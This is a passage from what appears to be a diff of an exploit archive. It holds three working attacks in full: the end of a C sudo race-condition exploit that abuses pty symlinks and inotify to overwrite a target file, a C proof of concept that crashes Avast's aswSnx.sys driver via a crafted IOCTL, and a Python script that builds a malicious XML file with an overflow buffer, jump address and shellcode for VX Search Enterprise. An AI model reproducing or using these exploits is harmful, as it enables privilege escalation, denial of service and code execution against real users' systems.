    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
 } while (0)
 int
 main(const int my_argc, const char * const my_argv[])
 {
    if (my_argc <= 1) die();
    if (my_argc >= INT_MAX/2) die();
    char comm[sizeof(WORKING_DIR) + 16];
    char pts[PATH_MAX];
    #define PTS_NUM 32
    int pts_fds[2 * PTS_NUM];
    unsigned int i = PTS_NUM;
    while (i--) {
        int ptm_fd;
        if (openpty(&ptm_fd, &pts_fds[i], pts, NULL, NULL)) die();
        if (close(ptm_fd)) die();
    }
    struct stat sbuf;
    if (fstat(*pts_fds, &sbuf)) die();
    if (!S_ISCHR(sbuf.st_mode)) die();
    if (sbuf.st_rdev <= 0) die();
    if ((unsigned int)snprintf(comm, sizeof(comm), "%s/     %lu ", WORKING_DIR, (unsigned long)sbuf.st_rdev)
                                  >= sizeof(comm)) die();
    for (i = 0; i < PTS_NUM; i++) {
        if (close(pts_fds[i])) die();
    }
    if (mkdir(WORKING_DIR, 0700)) die();
    if (symlink(pts, TTY_SYMLINK)) die();
    if (symlink(TARGET_FILE, TTY_SYMLINK_)) die();
    if (symlink(SUDO_BINARY, comm)) die();
    const int inotify_fd = inotify_init1(IN_CLOEXEC);
    if (inotify_fd <= -1) die();
    const int working_wd = inotify_add_watch(inotify_fd, WORKING_DIR, IN_OPEN | IN_CLOSE_NOWRITE);
    if (working_wd <= -1) die();
    const int cpu = sched_getcpu();
    if (cpu >= CPU_SETSIZE) die();
    if (cpu < 0) die();
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) die();
    const pid_t pid = fork();
    if (pid <= -1) die();
    if (pid == 0) {
        const unsigned int argc = 3 + my_argc - 1;
        char ** const argv = calloc(argc + 1, sizeof(char *));
        if (!argv) die();
        argv[0] = comm;
        argv[1] = "-r";
        argv[2] = SELINUX_ROLE;
        memcpy(&argv[3], &my_argv[1], my_argc * sizeof(char *));
        if (argv[argc]) die();
        if (setpriority(PRIO_PROCESS, 0, +19) != 0) die();
        static const struct sched_param sched_param = { .sched_priority = 0 };
        (void) sched_setscheduler(0, SCHED_IDLE, &sched_param);
        execve(*argv, argv, NULL);
        die();
    }
    struct inotify_event event;
    if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
    if (kill(pid, SIGSTOP)) die();
    if (event.wd != working_wd) die();
    if (event.mask != (IN_OPEN | IN_ISDIR)) die();
    for (i = 0; ; i++) {
        if (i >= sizeof(pts_fds) / sizeof(*pts_fds)) die();
        int ptm_fd;
        char tmp[PATH_MAX];
        if (openpty(&ptm_fd, &pts_fds[i], tmp, NULL, NULL)) die();
        if (!strcmp(tmp, pts)) break;
        if (close(ptm_fd)) die();
    }
    while (i--) {
        if (close(pts_fds[i])) die();
    }
    if (kill(pid, SIGCONT)) die();
    if (read(inotify_fd, &event, sizeof(event)) != (ssize_t)sizeof(event)) die();
    if (kill(pid, SIGSTOP)) die();
    if (event.wd != working_wd) die();
    if (event.mask != (IN_CLOSE_NOWRITE | IN_ISDIR)) die();
    if (rename(TTY_SYMLINK_, TTY_SYMLINK)) die();
    if (kill(pid, SIGCONT)) die();
    int status = 0;
    if (waitpid(pid, &status, WUNTRACED) != pid) die();
    if (!WIFEXITED(status)) die();
    if (unlink(comm)) die();
    if (unlink(TTY_SYMLINK)) die();
    if (rmdir(WORKING_DIR)) die();
    exit(WEXITSTATUS(status));
 }
--- a/platforms/windows/dos/42182.cpp
+++ b/platforms/windows/dos/42182.cpp
@ -0,0 +1,45 @@
 /**
 * Author: bee13oy
 * BSoD on Windows 7 x86 / Windows 10 x86  + Avast Premier / Avast Free Antivirus (11.1.2253)
 * Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
 *
 * There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl 
 * number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the 
 * context of SYSTEM.
 **/
 #include <Windows.h>
 void BSoD(const char* szDeviceName)
 {
 	HANDLE hDevice = CreateFileA(szDeviceName,
 		GENERIC_READ, 
 		0, 
 		NULL, 
 		OPEN_EXISTING, 
 		0, 
 		NULL);
 	if (hDevice != INVALID_HANDLE_VALUE)
 	{
 		DWORD nbBytes = 0;
 		CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"; 
 		CHAR bufOuput[0x8+1] = ""; 
 		DeviceIoControl(hDevice, 
 			0x82ac0170, 
 			bufInput, 
 			0x00000008, 
 			bufOuput, 
 			0x00000008, 
 			&nbBytes, 
 			NULL
 			); 
 	}
 }
 int _tmain(int argc, _TCHAR* argv[])
 {
 	BSoD("\\\\.\\aswSnx");
 	return 0;
 }
--- a/platforms/windows/local/42181.py
+++ b/platforms/windows/local/42181.py
@ -0,0 +1,48 @@
 import os
 import struct
 author = '''
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
 # Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
 # Date: 2017.06.15
 # Exploit Author: Greg Priest
 # Version: VX Search Enterprise v9.7.18
 # Tested on: Windows7 x64 HUN/ENG Professional
 '''
 overflow = "A" * 1536
 jmp_esp = "\x4E\x21\x1F\x65"
 #"\x94\x21\x1C\x65"
 shortjump = "\xEB\x55"
 shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
            "\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
            "\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
            "\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
            "\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
            "\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
            "\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
            "\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
            "\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
            "\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
            "\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
            "\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
            "\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
            "\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
            "\xae\xc2\x28\x4b\x32\x05")
 crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3
 evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
 exploit = open('Magic.xml', 'w')
 exploit.write(evil)
 exploit.close()
 print "Magic.xml raedy!"